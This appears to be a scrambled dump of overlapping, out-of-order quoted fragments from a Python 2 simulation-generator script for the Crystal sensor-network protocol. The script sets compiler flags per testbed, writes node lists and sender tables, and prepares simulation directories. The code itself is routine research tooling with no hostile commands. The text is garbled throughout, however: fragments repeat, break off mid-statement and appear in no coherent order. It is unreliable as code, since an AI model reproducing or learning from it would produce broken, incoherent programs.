\"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z,", "open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir)", "else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return", "ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\",", "{} pars = {} execfile(params, glb, pars) def set_defaults(dst, src): for k,v in", "if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't exist\")", "concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name", "= nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file", "e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in", "[\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed", "namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = {", "if nodemap != \"all\": with open(nodemap_txt) as f: for l in f: l", "set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars) print \"--- Preparing", "\"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if", "\"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == 
\"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if", "cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed ==", "following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set()", "+= [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed", "p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"]", "= sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] =", "{%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs,", "\".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except", "copy, rmtree import traceback import subprocess import itertools import re import random basepath", "cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"]", "longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period,", "k,v in src.items(): if k not in dst: dst[k] = v CcaTuple =", "x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e:", "= os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes,", "def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel,", "#!/usr/bin/env python2.7 import sys import argparse import traceback ap = 
argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath',", "num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"]", "in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca", "= active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] =", "os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name =", "p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"]", "if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\",", "\"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\"", "if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags", "\"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags}", "num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders) with", "dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed,", "+ \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd()", "in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes:", "if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders,", "n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) 
copy(abs_tbl_name, simdir) def", "in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\",", "\" \".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values)", "\"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm,", "as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir)", "nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel,", "f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir):", "l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in", "y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)],", "\"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging:", "namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2,", "if nodemap != \"all\" and not os.path.exists(nodemap_txt): 
raise Exception(\"Node map file does not", "= os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name", "} set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars) print \"---", "nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty)", "p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys())", "import argparse import traceback ap = argparse.ArgumentParser(description='Simulation generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path')", "file does not exist: \" + nodemap_txt) nodes = set(all_nodes) if nodemap !=", "with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name,", "xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for", "nodes = set(all_nodes) if nodemap != \"all\": with open(nodemap_txt) as f: for l", "open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] =", "with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"],", "sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir", "node doesn't exist\") all_senders = [x for x in nodes if x!=sink] new_env", "= os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")]", "0 r = [] while (l<n): x = random.choice(nodes) if x not in", "= [] while (l<n): x = random.choice(nodes) if x not in r: r.append(x)", "\"w\") as f: for 
n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name,", "[x for x in nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders,", "re import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath =", "#\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, }", "period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z,", "as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] =", "p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"]", "not None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static", "with open(nodemap_txt) as f: for l in f: l = l.strip() if l:", "open(\"nodelist.txt\") as f: for l in f: l = l.strip() if l: all_nodes.add(int(l.strip()))", "default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args()", "from shutil import copy, rmtree import traceback import subprocess import itertools import re", "copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty,", "set_defaults(dst, src): for k,v in src.items(): if k not in dst: dst[k] =", "Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l in", "!= \"all\" and not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \"", "\"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags", "\"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == 
\"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed", "\"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l", "p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"]", "NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t,", "\"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags += [\"-DSHORT_LOGS=1\"]", "------------------------\" all_nodes = set() with open(\"nodelist.txt\") as f: for l in f: l", "x in nodes if x!=sink] new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty,", "= power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"] =", "sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes,", "p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"]", "#apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\",", "+ \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name,", "subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\")", "(\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags =", "exist\") all_senders = [x for x in nodes if x!=sink] new_env = mk_env(power,", "pwd = os.getcwd() 
os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e", "is not None: random.seed(seed) for _ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return", "\"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath, \"apps\", \"crystal\") sys.path +=", "generator') ap.add_argument('--basepath', required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file')", "os.path.join(basepath, \"apps\", \"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n):", "\"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip,", "l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders", "not os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \" + nodemap_txt) nodes", "testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap", "p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"]", "= \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum +=", "args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath =", "payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop)", "header = \" \".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) 
f.write(header)", "f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e", "[\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb =", "\"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else:", "p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] = num_senders p[\"sink\"]", "from collections import namedtuple, OrderedDict from shutil import copy, rmtree import traceback import", "python file') args = ap.parse_args() import os from collections import namedtuple, OrderedDict from", "\"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty,", "prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes", "2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars,", "import random basepath = args.basepath #apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath,", "\"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, 
\"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r,", "os.path.exists(nodemap_txt): raise Exception(\"Node map file does not exist: \" + nodemap_txt) nodes =", "= seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"] =", "cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in", "100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following", "[\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l = 0 r =", "\"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\", \"-DCRYSTAL_START_DELAY_NONSINK=0\"] cflags = \"", "num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir =", "nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders =", "x = random.choice(nodes) if x not in r: r.append(x) l += 1 return", "simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip,", "return \"static const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name =", "abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd =", "channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env) if nodemap", "= boot_chop p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values = \" 
\".join([str(x)", "import traceback import subprocess import itertools import re import random basepath = args.basepath", "for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir)", "num_senders, longskip, n_empty, cca): cflags = [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs,", "longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps):", "nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name", "os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt):", "f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs", "all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap)", "nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes:", "\".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\") f.write(values) f.write(\"\\n\")", "Exception(\"Node map file does not exist: \" + nodemap_txt) nodes = set(all_nodes) if", "continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not os.path.exists(nodemap_txt): raise", "x not in r: r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs,", "(l<n): x = random.choice(nodes) if x not in r: r.append(x) l += 1", "= \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars =", "os from collections import namedtuple, OrderedDict from shutil import copy, rmtree import traceback", "+ nodemap_txt) nodes = set(all_nodes) if 
nodemap != \"all\": with open(nodemap_txt) as f:", "p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"]", "r.append(x) l += 1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = []", "(\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\": cflags +=", "help='Configuration python file') args = ap.parse_args() import os from collections import namedtuple, OrderedDict", "= l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel, sink, num_senders,", "cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt =", "cflags = \" \".join(cflags) new_env = {\"CFLAGS\":cflags} return new_env glb = {} pars", "sink not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for", "\"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None,", "\"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, \"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload,", "f: for l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink", "raise Exception(\"Sink node doesn't exist\") all_senders = [x for x in nodes if", "_ in xrange(num_epochs): tbl += rnd_unique(nodes, concurrent_txs) return \"static const uint8_t sndtbl[] =", "else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"]", "uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = 
\"crystal.sky\" def prepare_binary(simdir,", "f: for l in f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum =", "l = 0 r = [] while (l<n): x = random.choice(nodes) if x", "src.items(): if k not in dst: dst[k] = v CcaTuple = namedtuple(\"CcaTuple\", \"dbm", "open(nodemap_txt) as f: for l in f: l = l.strip() if l: nodes.remove(int(l.strip().split()[0]))", "n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap", "= \" \".join(p.keys()) values = \" \".join([str(x) for x in p.values()]) f.write(header) f.write(\"\\n\")", "cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty =", "if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed ==", "p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"] = channel p[\"period\"] = period p[\"senders\"]", "required=False, default=\"../..\", help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args =", "[\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"): cflags +=", "1 return r def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is", "os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as", "\"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs,", "= 
